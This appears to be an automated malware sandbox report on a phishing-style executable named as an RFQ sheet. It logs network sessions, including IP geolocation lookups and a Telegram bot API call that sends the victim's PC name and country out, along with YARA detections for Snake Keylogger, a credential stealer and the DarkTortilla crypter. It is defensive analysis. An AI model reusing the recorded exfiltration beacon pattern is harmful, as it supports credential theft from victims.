2025-01-10 08:29:24 UTC | 362               | IN        | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                        |                   |           | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.4 | 49915       | 104.21.80.1    | 443              | 7968 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp               | Bytes transferred | Direction | Data
2025-01-10 08:29:25 UTC | 61                | OUT       | GET /xml/8.46.123.189 HTTP/1.1
                        |                   |           | Host: reallyfreegeoip.org
2025-01-10 08:29:25 UTC | 865               | IN        | HTTP/1.1 200 OK
                        |                   |           | Date: Fri, 10 Jan 2025 08:29:25 GMT
                        |                   |           | Content-Type: text/xml
                        |                   |           | Content-Length: 362
                        |                   |           | Connection: close
                        |                   |           | Age: 1812554
                        |                   |           | Cache-Control: max-age=31536000
                        |                   |           | cf-cache-status: HIT
                        |                   |           | last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                        |                   |           | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bj0NRzA7jE%2FOSt%2FOOtbIU%2Bj8n%2FDr1%2FRtuLL7s9hfcL8Xx4PFEXklj%2B8jRAUtXxB6K6DlLivuqa4JBvKDKi1QAsOE2Bmrn4Db7%2BnCqj2DgZBPxszBi4p9cPNRwCdYgNlCaL0bF%2Fka"}],"group":"cf-nel","max_age":604800}
                        |                   |           | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        |                   |           | Server: cloudflare
                        |                   |           | CF-RAY: 8ffb4c9a7b91c443-EWR
                        |                   |           | alt-svc: h3=":443"; ma=86400
                        |                   |           | server-timing: cfL4;desc="?proto=TCP&rtt=1600&min_rtt=1595&rtt_var=609&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1781574&cwnd=244&unsent_bytes=0&cid=2e3e719ca08a57aa&ts=164&x=0"
2025-01-10 08:29:25 UTC | 362               | IN        | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                        |                   |           | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
6          | 192.168.2.4 | 49923       | 104.21.80.1    | 443              | 7968 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp               | Bytes transferred | Direction | Data
2025-01-10 08:29:26 UTC | 61                | OUT       | GET /xml/8.46.123.189 HTTP/1.1
                        |                   |           | Host: reallyfreegeoip.org
2025-01-10 08:29:26 UTC | 859               | IN        | HTTP/1.1 200 OK
                        |                   |           | Date: Fri, 10 Jan 2025 08:29:26 GMT
                        |                   |           | Content-Type: text/xml
                        |                   |           | Content-Length: 362
                        |                   |           | Connection: close
                        |                   |           | Age: 1812555
                        |                   |           | Cache-Control: max-age=31536000
                        |                   |           | cf-cache-status: HIT
                        |                   |           | last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                        |                   |           | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQ9POMVfG1sWBAL1ZRVz090XgsM2Xf34HxhxK7PRHex%2F0KVKWf4MJ%2BbJ%2Bc8B7dUd46b9nTNFdL0xH2B6qEZeT%2FveIvbXC1b0d2EB0KNTeQes2mWxVE8E1cTM0BAG2Z%2FNkMCGPra7"}],"group":"cf-nel","max_age":604800}
                        |                   |           | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        |                   |           | Server: cloudflare
                        |                   |           | CF-RAY: 8ffb4ca12de342d2-EWR
                        |                   |           | alt-svc: h3=":443"; ma=86400
                        |                   |           | server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1546&rtt_var=587&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1850443&cwnd=229&unsent_bytes=0&cid=df0d985bc9e8653a&ts=142&x=0"
2025-01-10 08:29:26 UTC | 362               | IN        | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                        |                   |           | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              7192.168.2.449931104.21.80.14437968C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2025-01-10 08:29:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                                              Host: reallyfreegeoip.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2025-01-10 08:29:27 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                                              Date: Fri, 10 Jan 2025 08:29:27 GMT
                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                              Content-Length: 362
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              Age: 1812556
                                                                                                                                                                                              Cache-Control: max-age=31536000
                                                                                                                                                                                              cf-cache-status: HIT
                                                                                                                                                                                              last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JhF2Lv3I3Sg55Sr2yu%2Fi%2B8MTRfSfxTJSeztYALThqdAlaoG9TNqI%2Fas7u6raGvcVB4h1Khuhs0i0bGIFfF%2BswB1hUHrMxQqZW0c2640ejUUUJ6OLtzBHfQ5kDkWIMMRRgxjOhdiG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8ffb4ca87a9142d2-EWR
                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1572&min_rtt=1563&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1778319&cwnd=229&unsent_bytes=0&cid=0274dce7e02f55ed&ts=154&x=0"
2025-01-10 08:29:27 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 8
Source IP: 192.168.2.4
Source Port: 49940
Destination IP: 104.21.80.1
Destination Port: 443
PID: 7968
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 08:29:28 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 08:29:28 UTC | 863 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 08:29:28 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1812557
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kcb%2FdwkHBNzqo7D3Ble8e5j5t3PW8p0yd%2FzmHSpYiqV%2B2q0iGaKFEVgaDtipc%2FIlRohbL4QOncIAUan1%2BJ8HC4XntOjKomh%2FJSFHoCUnYAlxdGOpjwkNOunzK3mMmXfI%2BiQpXJ3"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffb4caf38d243ee-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1750&min_rtt=1749&rtt_var=658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1660978&cwnd=228&unsent_bytes=0&cid=75d1c22ba7910172&ts=136&x=0"
2025-01-10 08:29:28 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID: 9
Source IP: 192.168.2.4
Source Port: 49946
Destination IP: 149.154.167.220
Destination Port: 443
PID: 7968
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 08:29:29 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20and%20Time:%2010/01/2025%20/%2014:05:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813435%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2025-01-10 08:29:29 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Fri, 10 Jan 2025 08:29:29 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 08:29:29 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                              Start time:03:28:05
                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                              Path:C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.exe"
                                                                                                                                                                                              Imagebase:0xcd0000
                                                                                                                                                                                              File size:842'624 bytes
                                                                                                                                                                                              MD5 hash:02BC82A10C674C5C8F60D293E22A544E
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2475804920.0000000005620000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2463896944.0000000003101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2474193722.0000000004109000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2474193722.0000000004215000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                              Start time:03:28:45
                                                                                                                                                                                              Start date:10/01/2025
                                                                                                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                                                                                                                                              Imagebase:0x950000
                                                                                                                                                                                              File size:42'064 bytes
                                                                                                                                                                                              MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000005.00000002.2988851400.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2990704063.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000005.00000002.2990704063.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:16.6%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                Signature Coverage:5.4%
                                                                                                                                                                                                Total number of Nodes:112
                                                                                                                                                                                                Total number of Limit Nodes:3

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                control_flow_graph 382 8190013-8190072 384 8190079-819034c 382->384 385 8190074 382->385 416 8192f29-81933a2 384->416 417 8190352-819151a 384->417 385->384 496 81933a8-81948d3 416->496 497 81948d4-8195e39 416->497 840 81919ab-8192f28 417->840 841 8191520-81919aa 417->841 496->497 1095 8195e3f-8196274 497->1095 1096 8196275-8196298 497->1096 840->416 841->840 1095->1096 1100 819629e-8196a94 1096->1100 1101 8196a95-8198072 call 8199643 1096->1101 1100->1101 1510 8198078-8198080 1101->1510
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 5a6a92b3cb130716e7f9e3d7785a6524e2cc37f7a51e07e7c65e62a6945c0f51
                                                                                                                                                                                                • Instruction ID: 18cdb04fd5ae5279b06790d5411356095789b55339e620435c113c58f21835d1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5a6a92b3cb130716e7f9e3d7785a6524e2cc37f7a51e07e7c65e62a6945c0f51
                                                                                                                                                                                                • Instruction Fuzzy Hash: 25F3EF70D05628CBCB64EF29E9886ACBBB1FF46304F4055E9D08CA6254DB315EE9CF46

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                control_flow_graph 1512 8190040-8190072 1513 8190079-819034c 1512->1513 1514 8190074 1512->1514 1545 8192f29-81933a2 1513->1545 1546 8190352-819151a 1513->1546 1514->1513 1625 81933a8-81948d3 1545->1625 1626 81948d4-8195e39 1545->1626 1969 81919ab-8192f28 1546->1969 1970 8191520-81919aa 1546->1970 1625->1626 2224 8195e3f-8196274 1626->2224 2225 8196275-8196298 1626->2225 1969->1545 1970->1969 2224->2225 2229 819629e-8196a94 2225->2229 2230 8196a95-8198072 call 8199643 2225->2230 2229->2230 2639 8198078-8198080 2230->2639
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479657020.0000000008190000.00000040.00000800.00020000.00000000.sdmp, Offset: 08190000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_8190000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: fa81de169c1bdd39726429fcf2df5ac2b831dcf4b24b6edca784582a10160cde
                                                                                                                                                                                                • Instruction ID: a2289953acf2e9ea85c91e1da1334d98e8e77783c5eee862fcaec2b391c786c3
                                                                                                                                                                                                • Opcode Fuzzy Hash: fa81de169c1bdd39726429fcf2df5ac2b831dcf4b24b6edca784582a10160cde
                                                                                                                                                                                                • Instruction Fuzzy Hash: 36F3EF70D05628CBCB64EF29E9886ACBBB1FF46304F4055E9D08CA6254DB315EE9CF46

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                control_flow_graph 2641 6817588-68175ca 2643 68175d1-681777c 2641->2643 2644 68175cc 2641->2644 2665 6817787-68177b6 2643->2665 2644->2643 2666 68177be-68178e2 2665->2666 2676 68178e9-68178fb 2666->2676 2677 6817903-681ebfa 2676->2677 3661 681ec05 2677->3661 3663 681ec0b call 68206d0 3661->3663 3664 681ec0b call 68206e0 3661->3664 3662 681ec11-681ec19 3663->3662 3664->3662
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: b69ed34dc508632b231125ab243a3d0952e800edb56a58a697e4d30fdf5c3fad
                                                                                                                                                                                                • Instruction ID: 24906726d566bf488f40d2e9b2e5963ca161388f744abf2559fea54c6dbab79b
                                                                                                                                                                                                • Opcode Fuzzy Hash: b69ed34dc508632b231125ab243a3d0952e800edb56a58a697e4d30fdf5c3fad
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7BE3F074D05628CBCB24EF29E98869CBBB2FF49300F4055E9D18CA6254DB315EE9CF49

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                control_flow_graph 3665 6817598-68175ca 3666 68175d1-68178fb 3665->3666 3667 68175cc 3665->3667 3700 6817903-681ebfa 3666->3700 3667->3666 4684 681ec05 3700->4684 4686 681ec0b call 68206d0 4684->4686 4687 681ec0b call 68206e0 4684->4687 4685 681ec11-681ec19 4686->4685 4687->4685
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 86457af113b94de6a41660ccac806b5936e71c6a7616cd62c7bb4f7be24f0d1a
                                                                                                                                                                                                • Instruction ID: 1f01009e56ac0a1b53745ae40fb09eee5df844d1b1f730bb92b2d134d853c3b5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 86457af113b94de6a41660ccac806b5936e71c6a7616cd62c7bb4f7be24f0d1a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CE3F074D05628CBCB24EF29E98869CBBB2FF49300F4055E9D18CA6254DB315EE9CF49

                                                                                                                                                                                                Control-flow Graph

